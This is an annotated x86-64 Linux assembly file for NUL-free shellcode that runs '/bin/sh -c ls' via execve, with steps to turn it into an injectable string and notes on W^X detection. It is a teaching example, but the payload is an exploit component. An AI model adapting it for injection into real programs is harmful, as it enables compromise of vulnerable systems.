# Syntax: GAS (AT&T), x86-64. Target: Linux, raw System V syscall interface
# (no libc). C equivalent of what the code does:
#   execve("/bin/sh", (char *[]){"/bin/sh", "-c", "ls", NULL}, NULL);
#
# This shell code program could be converted to a C style string using:
#
# as --64 shellcode.s -o shellcode.o
# ld shellcode.o -o shellcode
# objcopy -j.text -O binary shellcode shellcode.bin
# hexdump -v -e '"\\""x" 1/1 "%02x" ""' shellcode.bin

# This shell code program can't be run directly but it will operate as shellcode
# once converted to a string and injected into an exploitable program. This code
# is designed to avoid any NUL(0x00) byte characters being generated.
#
# Why it can't run as a plain ELF: the byte stores after `overdata` write into
# the text segment, which the loader maps read+execute only, so they fault. The
# pattern therefore depends on a page that is both writable and executable,
# which is also what makes it stand out to W^X enforcement and memory-scanning
# detections.

.section .text
.globl _start
_start:
jmp overdata # Skip over the data below; code and data share the same segment

# Strings are stored without their NUL terminator. Each 0xff placeholder is
# overwritten with 0x00 at run time by the stores after `overdata`.
name:.ascii "/bin/sh" # Program to run
name_nul: .byte 0xff # Placeholder terminator, replaced by 0x00 at run time
arg1:.ascii "-c" # Program argument
arg1_nul: .byte 0xff # Placeholder terminator, replaced by 0x00 at run time
arg2:.ascii "ls" # Program Argument
arg2_nul: .byte 0xff # Placeholder terminator, replaced by 0x00 at run time

overdata:
xor %eax, %eax # RAX = 0 (a 32-bit write zero-extends into the full register)

# All references to the data before our code use a negative RIP-relative
# displacement. RIP-relative addressing always encodes a 32-bit displacement;
# because the distance here is small and negative, the sign-extended high bytes
# are 0xff rather than 0x00, so no NUL bytes appear in the code. RIP-relative
# addressing also keeps the code position independent once loaded in memory.

# Zero terminate each of the strings. These three stores modify the text
# segment itself (self-modifying code); see the header note on why that
# requires a writable+executable page.
mov %al, arg2_nul(%rip)
mov %al, arg1_nul(%rip)
mov %al, name_nul(%rip)

lea name(%rip), %rdi # RDI = pointer to program name string (execve arg 1: filename)

# Build argv on the stack, last element first, so that RSP ends up pointing at
# argv[0]: { "/bin/sh", "-c", "ls", NULL }. No stack alignment is needed here
# because the code never executes a `call`.
push %rax # NULL terminate the program argument array (RAX is still 0)
leaq arg2(%rip), %rsi
push %rsi # Push the address of the 3rd program argument on stack
lea arg1(%rip), %rsi
push %rsi # Push the address of the 2nd program argument on stack
push %rdi # Push the address of the program name on stack as 1st argument
mov %rsp, %rsi # RSI = Pointer to the program argument array (execve arg 2: argv)

mov %rax, %rdx # RDX = 0 = NULL envp parameter (execve arg 3)

mov $59, %al # RAX = execve system call number (write low byte only; upper bits are already 0)

syscall
# On success execve replaces the process image and never returns. On failure
# the kernel leaves -errno in RAX and execution falls off the end of this code
# into whatever bytes follow it in memory; there is no error or exit path here.